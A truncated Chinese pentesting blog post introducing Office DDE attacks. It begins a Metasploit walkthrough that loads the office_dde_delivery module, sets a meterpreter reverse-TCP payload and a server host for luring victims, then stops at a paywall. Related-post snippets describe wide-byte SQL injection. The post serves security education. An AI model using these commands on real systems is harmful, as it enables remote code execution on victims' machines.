【漏洞挖掘】——22、DDE漏洞攻击介绍

已于 2024-06-04 17:45:30 修改
阅读量1.5k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 【WEB渗透】 文章标签: 渗透测试 信息安全 网络安全 web渗透
于 2018-03-03 21:30:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fly_hps/article/details/79432998
本文介绍了DDE(动态数据交换)漏洞攻击,一种利用Microsoft Office功能在不使用宏的情况下执行任意代码的方法。通过Metasploit框架和CactusTorch工具,详细阐述了如何生成有效载荷并诱导受害者执行,以实现远程代码执行。尽管DDE攻击在红队评估中有效,但目前防病毒公司正尝试检测此类攻击,因此混淆技术在创建逃避检测的有效载荷中至关重要。
基本介绍

2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估

利用方式
Metasploit

MSF框架中提供了对DDE漏洞的利用模块,我们可以直接使用该模块生成有效载荷并将其投放给受害者用户诱导其点击运行

msf6 > use exploit/windows/fileformat/office_dde_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_dde_delivery) > show options
msf6 exploit(windows/fileformat/office_dde_delivery) > set SRVHOST 192.168.204.135
SRVHOST => 192.168.204.135
msf6 exploit(windows/fileformat/office_dde_delivery) > set payload windows/x64/meterpreter/reverse
了解本专栏 订阅专栏 解锁全文
ms office DDE攻击与防御
09-17
动态数据交换(DDE),它是在Microsoft Windows操作系统中实现的客户端/服务器通信方法,自1987年早期的Windows 2.0基于Windows Messaging,并使用其功能来启动双方之间的连接,服务器侦听某些主题和消息,对其进行响应到客户端并终止连接。 它被用于向诸如办公产品和浏览器的应用程序发送参数,发送命令到shell -explorer-来创建开始菜单组和链接,并在不同的应用程序和服务之间进行集成。 Microsoft将DDE定义为允许应用程序共享数据的一组消息和准则。Microsoft文档说明,应用程序可以使用DDE协议进行一次数据传输,以便应用程序在新数据可用时将更新发送给彼此。
如何运用宽字节实现Sql注入?
MSB_WLAQ的博客
10-08 389
什么是魔术引号 了解一个PHP的防御函数==》magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)等字符都会被加上反斜线 magic_quotes_gpc的作用:当PHP的传参中有特殊字符就会再前面加转义字符'\',来做一定的过滤.
Office DDE 攻击
10-24 285
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods ...
JavaScript 权威指南:将字符串转换为字符数组的正确方法
最新发布
weixin_42107409的博客
10-10 388
摘要:JavaScript中将字符串转为字符数组时,传统方法split('')存在严重缺陷,它会错误拆解Emoji等Unicode字符(如将"😂"拆为两个无效代码单元)。本文揭示了这一UTF-16代码单元层面的陷阱,并推荐两种ES6现代解决方案:展开语法[...str](首选)和Array.from(str),它们基于码点迭代,能完美处理所有Unicode字符。对比表明,展开语法兼具Unicode安全性、简洁性和高可读性,应作为新项目的标准实践,而split('')应被视为遗留反模式避
宽字节注入实例
vivlol918的博客
06-07 189
宽字节注入是一种针对网站及应用程序的攻击技术,也是一种针对SQL注入的特殊形式。
【SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2796
符号 GBK编码 ’ 27
宽字节(宽字符)注入
Yatere的天平秤
04-24 2179
宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
漏洞挖掘】——60、SVN信息泄露漏洞检测利用
Fly_鹏程万里
10-20 2186
SVN是一个开放源代码的版本控制系统,在使用SVN管理本地代码过程中会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息,网站管理员在发布代码时如果没有使用导出功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏文件夹被暴露于外网环境,可以利用.svn/entries文件获取到服务器源码。
漏洞挖掘】——20、RFD漏洞介绍挖掘
Fly_鹏程万里
03-03 2242
RFD(Reflected File Download)即反射型文件下载漏洞,2014年在BlackHat中被提出,该漏洞在原理上类似XSS,在危害上类似DDE攻击者可以通过一个URL地址使用户下载一个恶意文件,从而危害用户的终端PC,不过这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的低危漏洞,但微软,雅虎,eBay,PayPal和其他许多公司认为这是一个中危漏洞
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
热门推荐
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这篇文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
渗透测试工程师面试题总结(一)
记录开发和安全学习过程中的点点滴滴
08-26 1817
渗透测试工程师的面试题进行总结
宽字节注入
buffedon的博客
07-27 439
宽字节注入原理实例找注入点判断列数查询信息总结 原理 利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ascaii要大于128) PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。如上图所示%df’被PHP转义,单引号被加上反斜杠\,变成了%d’,其中\的十六进制是%5C,那么现在%d’=%d%5C%27, 如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK编码时,会认为 %df
宽字节注入%df的理解
tpaer的博客
10-24 7563
关于%df宽字节注入的理解
宽字节搭建过程
战神/calmness的博客
08-09 252
1.背景 现在大多数网站使用unicode国际编码和utf-8编码,不过国内现在有的数据库使用了GBK编码,以及一些错误的配置导致出现了宽字节注入,也是SQL注入的一种方法。宽字节注入的出现是因为,程序员在编写过程中连接mysql数据库时错误的设置: set character_set_client=gbk,其中php代码:mysql_query("SET NAMES 'GBK'"); 指定三个字符集(客户端,连接层,结果集) 使用addslashes函数过滤提交的参数时,测试的注入点使用的单.
SQL(宽字节注入)
qq_45521281的博客
05-28 890
GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df\.
【sql注入】宽字节注入详解
Yuppie001的博客
04-14 2005
1.什么是宽字节?2.宽字节注入原理二.sqli-labs-36关。
使用VB与组态王实现数据实时交换——DDE技术详解
本文主要介绍了如何利用Visual Basic (VB) 应用程序与组态王(Kingview)进行实时数据交换,以便在VB程序中获取和显示来自组态王系统的实时数据。组态王是一款流行的工业自动化监控软件,而VB应用程序则作为客户端,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值